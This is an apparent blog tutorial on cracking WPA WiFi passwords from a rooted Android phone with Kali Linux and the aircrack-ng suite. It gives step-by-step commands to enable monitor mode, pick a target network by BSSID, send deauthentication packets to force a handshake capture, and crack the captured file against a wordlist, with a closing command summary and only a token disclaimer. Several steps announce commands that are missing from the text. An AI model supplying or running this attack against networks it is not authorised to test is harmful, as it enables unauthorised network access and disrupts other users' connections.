1 How to get wifi Password on Android Using Kali Linux1.1 How To Hack WiFi Password Using Android.1.1.1 Hack Wifi Password on Android Using Kali Linux – Conclusion 

How To Hack WiFi Password Using Android.

#Requirements  #1. Kali Linux For Android Phone. #2. Rooted Android Device. Hack Wifi Password on Android Using KALI LINUX:- #1. Install Kali Linux or Linux Deploy in your android device with aircrack-ng. #2. if you don’t have aircrack-ng suite get it by this commend in terminal. Follow Below Steps. Then a wireless network adapter that support monitor mode Shown on your android screen like  a- Alfa 2W AWUS036NH b- Alfa AWUS036H c- wifiy-city 56G #3.A word list comprising of all the possible different combination of pass-phrases. Now let’s go ahead and lets try to hack wifi password on android using kali linux easily. in this hack iTechhacks will be using wifiy-city 56G card on Kali linux 2 sana #4. open up your terminal as root and type:- this will display you all the networking interfaces that are connected to your device. If your wireless network adapter is working fine you should see the ”wlan0 ” the name may change if you have more then one connected wireless adapter. #5. Now to start monitor mode type:- ‘airmon-ng’ is a traffic monitoring tool ‘wlan0’ is your wireless interface after this command it would start the monitor mode in the red area a list of process id’s that cause trouble during the process so kill those processes by typing So, according to me : kill 743 898 1070 1071 1081 now type ifconfig and this will display the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0 . #6.To show the list of available WiFi network type:- ‘airodump-ng’ is a wifi packets capturing tool ‘wlan0mon is my monitoring interface ‘airodump-ng‘ will start capturing all packets and from the captured packets. select your target and note its ‘bssid’ (bssid = base service set identifier) and channel- then stop the capture by pressing “contrl+c“. #7. Start capturing the packets of your target network type the following command:-  E.g: airodump-ng -c 2 -w wifi –bssid C0:4A:00:F0:F4:24 wlan0mon3 this will start the capturing of packets.and if you get the handshake you wont need the aireplay command.if you don’t get the handshake yet,while the capturing of packets goes on, open a new terminal as root and type:- aireplay-ng = tool for deauthentication, fake authentication and other packet injections, -0 = number associated for deauthentication, 0 = deauth count, -a = bssid, here we are trying to send a deauthentication request. according to me, the command looks like aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon4 after few seconds stop it using contrl+c. now after we have successful captured the wpa handshake #8. Stop the capturing using contrl+c and type “ls” that would bring up all the current directories and files. Select the file with “.cap“ extension and type the following command:- aircrack-ng is a tool that helps in cracking the wifi password In my case the command looks like aircrack-ng -w /usr/share/wordlists/more_than_8.txt ***-01.cap Now it starts finding suitable pass phrase. and now all you have to do is wait till you see the lovely news ( KEY Found ( KEY is HERE )

Hack Wifi Password on Android Using Kali Linux – Conclusion 

  1. airodump-ng wlan0mon
  2. airodump-ng -c 9 -w wifi –bssid C4:6E:1F:F6:34:B8 wlan0mon
  3. aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
  4. aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap So this is all about wifi password hacking trick . this is not easy way to hack wifi password, but if you do this correctly then it works amazingly, but iTech Hacks recommend you to dont follow this method because sometime this method caught you in trouble.hack wifi password on android this is only for those who demand this. 

Δ

How to Get Wifi Password on Android Using Kali Linux - 84How to Get Wifi Password on Android Using Kali Linux - 47How to Get Wifi Password on Android Using Kali Linux - 31How to Get Wifi Password on Android Using Kali Linux - 69How to Get Wifi Password on Android Using Kali Linux - 92